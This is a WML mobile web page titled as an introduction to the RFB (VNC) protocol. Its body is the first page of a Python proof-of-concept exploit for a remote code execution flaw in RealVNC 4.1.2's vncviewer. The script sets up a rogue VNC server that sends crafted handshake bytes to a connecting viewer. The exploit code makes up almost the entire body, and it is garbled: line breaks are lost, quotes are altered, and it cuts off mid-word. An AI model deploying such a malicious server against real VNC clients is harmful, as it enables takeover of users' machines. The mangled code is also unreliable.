<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<head><meta forua="true" http-equiv="Cache-Control" content="max-age=0" /></head>
<card title="The RFB Protocol（RFB协议）简介" id="card1">
<p> 游客</p><p>
标题:The RFB Protocol（RFB协议）简介<br/>
正文:<br/>
RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC#!/usr/bin/env python# POC: RealVNC 4.1.2 ’vncviewer.exe’ RFB Protocol Remote Code Execution Vulnerability, BID 30499#Author: Andres Lopez Luksenberg &amp;lt;polakocai@gmail.com&amp;gt;#import socketserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)serversocket.bind((’’, 5900))serversocket.listen(1)while True:clientsocket, clientaddres = serversocket.accept()data = ’RFB 003.008\n’clientsocket.sendall(data)data_cli = clientsocket.recv(1024)print data_clidata = ’\x01\x01’clientsocket.sendall(data)data_cli = clientsocket.recv(1024)print repr(data_cli)data = ’\x00\x00\x00\x00’clientsocket.sendall(data)data = ’\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32’clientsocket.sendall(data)data_cli = clientsocket.recv(1024)print repr(data_cli)data_cli = clientsocket.recv(1024)print repr(data_cli)data_c<br/><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=376&amp;Page=1">[&lt;&lt;]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=376&amp;Page=1">[[1]]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=376&amp;Page=2">[2]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=376&amp;Page=3">[3]</a><a href="http://camnpr.com/wap.asp?mode=WAP&amp;act=View&amp;id=376&amp;Page=3">[&gt;&gt;]</a><br/>
<br/>
<a href="wap.asp?act=Com&amp;id=376">查看评论(0)</a><br/>
<a href="wap.asp?act=AddCom&amp;inpId=376">发表评论</a><br/><br/>

<br/>

<br/>
<a href="http://camnpr.com/wap.asp">首页</a>
</p>
</card>
</wml>